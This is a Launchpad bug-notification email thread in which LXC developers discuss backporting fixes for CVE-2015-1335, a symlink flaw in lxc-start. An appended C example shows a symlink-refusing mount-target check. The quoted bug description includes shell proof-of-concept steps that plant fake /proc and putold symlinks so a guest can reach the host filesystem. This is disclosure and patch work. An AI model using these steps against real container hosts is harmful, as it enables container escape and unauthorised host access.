Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de):
> Hi Serge,
>
> sorry for getting back to this so late.
>
> On Tue 08 Dec 2015 17:08:58 CET, Serge Hallyn wrote:
>
> > Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de):
> >> today I worked on backporting available fixes for CVE-2015-1335 to LXC
> >> 0.7.x (as found in Debian squeeze-lts).
> >>
> >> The patch is attached, I am still in the testing-for-regressions phase.
> >> Can any of the LXC devs take a look at the patch and maybe see if it is
> >> suitable for Ubuntu 12.04, as well?
> >
> > Hi,
> >
> > So the thing to look for is any unconverted "mount" calls. It
> > looks like the lxc_setup_fs() calls to mount_fs() are not being
> > protected. So the container admin could attack through a /proc
> > symlink.
>
> Hmmm... ok...
>
> I just checked upstream Git and the location you refer to is not using
> safe_mount either there [1]
Huh, that's odd. Yes those should be protected, since /proc etc in the
container could be symlinks. Do you mind sending a patch?

> Furthermore, it seems non-trivial to inform safe_mount about the root
> path from within lxc_init.c.
>
> Do you have any input on the following questions?:
>
> o Why is mount_fs() in latest HEAD still using the mount() call
>   instead of safe_mount()?
> o How could one pipe the rootfs path into lxc_setup_fs() -> mount_fs()?

You shouldn't need to - it's just '/' because you're already chrooted there.

> Thanks for any input.
>
> Mike
>
> [1] https://github.com/lxc/lxc/blob/master/src/lxc/initutils.c#L35
> --
>
> DAS-NETZWERKTEAM
> mike gabriel, herweg 7, 24357 fleckeby
> phone: +49 (1520) 1976 148
>
> GnuPG Key ID 0x25771B31
> mail: mike.gabr...@das-netzwerkteam.de, http://das-netzwerkteam.de
>
> freeBusy:
> https://mail.das-netzwerkteam.de/mailxchange/kronolith/fb.php?u=m.gabriel%40das-netzwerkteam.de
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> Matching subscriptions: lxc
> https://bugs.launchpad.net/bugs/1476662
>
> Title:
>   lxc-start symlink vulnerabilities may allow guest to read host
>   filesystem, interfere with apparmor
>
> Status in lxc package in Ubuntu:
>   Fix Released
>
> Bug description:
>   lxc-start shuffles around mounts using helper directory
>   /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
>
>   It then modifies mounts operating in guest root directory before
>   invoking init.
>   As it does not check if all mount points are
>   directories, a malicious guest may modify its internal structure
>   before shutdown (or was created using manipulated image) and then when
>   started again, guest may
>
>   * Access the whole host root filesystem
>
>   * Block switching from lxc-start apparmor profile to lxc-container-default
>
>   # Real putold before pivot-root (root fs will end here)
>   mkdir -p /x/lxc_putold
>
>   # Faked putold
>   ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
>   mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
>
>   # proc fake
>   mkdir -p /x/proc
>   umount /proc
>   rmdir /proc
>   ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
>
>   mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
>
>   The issue was also found during
>   https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662

Mailing list: https://launchpad.net/~touch-packages
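Serge's point in the exchange above is that every mount target inside the rootfs must be opened without following symlinks before anything is mounted on it, and that the rootfs is simply "/" because lxc_setup_fs() already runs chrooted. The following is an added example of such a check in C; it is not LXC's safe_mount, not the attached patch, and assumes a Linux system where the rootfs is available as a directory fd. The function names open_nofollow and demo_symlink_rejection, the temp-dir layout and the /tmp path are this example's own.

```c
/* Added example, not LXC's own code: open a mount target inside the chrooted
 * rootfs component by component, refusing symlinks, so a guest-planted symlink at
 * /proc cannot redirect a mount. Linux only; these function names are ours. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Walk `path` relative to directory fd `rootfd` ("/" once chrooted). O_NOFOLLOW
 * only guards the last component, hence one openat() per component: a symlink is
 * refused, a regular file fails with ENOTDIR, and check and open are one syscall
 * so the guest cannot swap the entry in between. ".." is rejected too. Returns fd or -1. */
int open_nofollow(int rootfd, const char *path)
{
    char copy[4096], *save, *comp; int fd = -1;
    if (strlen(path) >= sizeof copy) { errno = ENAMETOOLONG; return -1; }
    strcpy(copy, path);
    for (comp = strtok_r(copy, "/", &save); comp; comp = strtok_r(NULL, "/", &save)) {
        if (!strcmp(comp, "..")) { if (fd >= 0) close(fd); errno = EXDEV; return -1; }
        int next = openat(fd < 0 ? rootfd : fd, comp,
                          O_RDONLY | O_NOFOLLOW | O_DIRECTORY | O_CLOEXEC);
        if (fd >= 0) close(fd);
        if (next < 0) return -1;
        fd = next;                /* mount(2) can then target "/proc/self/fd/<fd>" */
    }
    return fd < 0 ? dup(rootfd) : fd;   /* empty path means rootfd itself */
}

/* Self-test on a constructed tree in a temp dir: a real proc/1 directory, a
 * symlink "fakeproc" pointing at an existing directory (an unchecked mount would
 * follow it), and a regular file "plain". Returns 1 if only the real dir passes. */
int demo_symlink_rejection(void)
{
    char tmpl[] = "/tmp/nofollowXXXXXX", *dir = mkdtemp(tmpl);
    if (!dir) return 0;
    int root = open(dir, O_RDONLY | O_DIRECTORY);
    int plain = openat(root, "plain", O_CREAT | O_WRONLY | O_EXCL, 0644);
    if (root < 0 || plain < 0 || mkdirat(root, "proc", 0755) ||
        mkdirat(root, "proc/1", 0755) || symlinkat(dir, root, "fakeproc")) return 0;
    int good = open_nofollow(root, "proc/1"), bad = open_nofollow(root, "fakeproc/1");
    int file = open_nofollow(root, "plain"), file_err = errno;
    int ok = good >= 0 && bad < 0 && file < 0 && file_err == ENOTDIR;
    unlinkat(root, "fakeproc", 0); unlinkat(root, "plain", 0);
    unlinkat(root, "proc/1", AT_REMOVEDIR); unlinkat(root, "proc", AT_REMOVEDIR);
    close(good); close(plain); close(root); rmdir(dir);
    return ok;
}
```

The walk only establishes that the target is a real directory reached without following a symlink; the caller still decides what to mount there and must pass the verified fd, not the original path string, to the mount.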